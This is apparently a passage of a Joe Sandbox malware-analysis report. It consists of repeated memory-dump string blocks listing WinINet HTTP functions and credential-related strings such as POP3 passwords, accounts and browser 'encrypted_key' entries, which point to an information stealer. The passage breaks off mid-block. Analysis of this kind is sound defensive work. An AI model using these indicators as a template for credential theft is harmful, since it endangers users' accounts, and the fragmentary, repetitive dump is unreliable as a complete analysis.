                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $)$C$D$E$F$F$G$R$\$a$c$e$g$i$r$r$v$x
                                                                                                                                                              • API String ID: 0-401266261
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: C$D$I$\$a$a$c$e$e$l$n$o$o$r$r$s$s$t$y
                                                                                                                                                              • API String ID: 0-2101568155
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $)$C$D$E$F$F$G$R$\$a$c$e$g$i$r$r$v$x
                                                                                                                                                              • API String ID: 0-401266261
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: C$D$I$\$a$a$c$e$e$l$n$o$o$r$r$s$s$t$y
                                                                                                                                                              • API String ID: 0-2101568155
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Clos$CloseHandle$File$Http$HttpSendRequestA$Inte$InternetReadFile$ReadFile$Requ$Requ$RequestA$SendRequestA$dle$eHan$estA$rnet$rnetReadFile
                                                                                                                                                              • API String ID: 0-771367364
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: I$O$R$V$_$c$k$l$o$r$r$t$t$u$v$x
                                                                                                                                                              • API String ID: 0-2161164058
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $O$S$\$a$a$a$e$e$l$o$p$r$t
                                                                                                                                                              • API String ID: 0-734595753
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: A$ConnectA$Http$HttpOpenRequestA$InternetConnectA$InternetOpenA$Open$OpenRequestA$Requ$RequestA$ectA$estA$rnetConnectA$rnetOpenA
                                                                                                                                                              • API String ID: 0-2462375318
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $O$S$\$a$a$a$e$e$l$o$p$r$t
                                                                                                                                                              • API String ID: 0-734595753
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                                              • API String ID: 0-392141074
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                                              • API String ID: 0-392141074
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                                                                                                                              • API String ID: 0-2356907671
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: F$P$T$T$d$d$f$i$r$r$u$x
                                                                                                                                                              • API String ID: 0-2987356081
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                              • API String ID: 0-685823316
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                              • API String ID: 0-685823316
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                              • API String ID: 0-685823316
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                              • API String ID: 0-685823316
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                                                              • API String ID: 0-2304485323
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                                                              • API String ID: 0-2304485323
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$unt$unt$word$word
                                                                                                                                                              • API String ID: 0-861207480
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: C$U$a$b$d$i$k$n$o
                                                                                                                                                              • API String ID: 0-3121204512
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: URL: $URL: $.$e$i$n$o$p
                                                                                                                                                              • API String ID: 0-3231755416
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: :$:$P$U$U$e$l$s
                                                                                                                                                              • API String ID: 0-522774390
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: :$:$P$U$U$e$l$s
                                                                                                                                                              • API String ID: 0-522774390
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: "}$L$S$\$a$c$encrypted_key$l
                                                                                                                                                              • API String ID: 0-2423294891
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: "}$L$S$\$a$c$encrypted_key$l
                                                                                                                                                              • API String ID: 0-2423294891
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA$rnetOpenA
                                                                                                                                                              • API String ID: 0-3717097293
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: URL: $2$8$L: $\$e$r
                                                                                                                                                              • API String ID: 0-2946516076
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: L$S$\$a$c$e$l
                                                                                                                                                              • API String ID: 0-3322591375
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: L$S$\$a$c$e$l
                                                                                                                                                              • API String ID: 0-3322591375
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                                                                              • API String ID: 0-1024195942
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                                                                                              • API String ID: 0-4071423757
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                                                                                              • API String ID: 0-4071423757
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: %$&$3$L$Q$Z$z
                                                                                                                                                              • API String ID: 0-3987438779
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Http$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                                                                              • API String ID: 0-1070052511
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: File$Inte$InternetReadFile$Read$ReadFile$rnet$rnetReadFile
                                                                                                                                                              • API String ID: 0-4188302782
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: File$Inte$InternetReadFile$Read$ReadFile$rnet$rnetReadFile
                                                                                                                                                              • API String ID: 0-4188302782
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: A$c$g$s$t$u
                                                                                                                                                              • API String ID: 0-3813946880
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: A$c$g$s$t$u
                                                                                                                                                              • API String ID: 0-3813946880
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: F$P$T$f$r$x
                                                                                                                                                              • API String ID: 0-2523166886
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 10$2008$2012$2016$7$8
                                                                                                                                                              • API String ID: 0-783846285
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 10$2008$2012$2016$7$8
                                                                                                                                                              • API String ID: 0-783846285
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: F$P$T$f$r$x
                                                                                                                                                              • API String ID: 0-2523166886
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
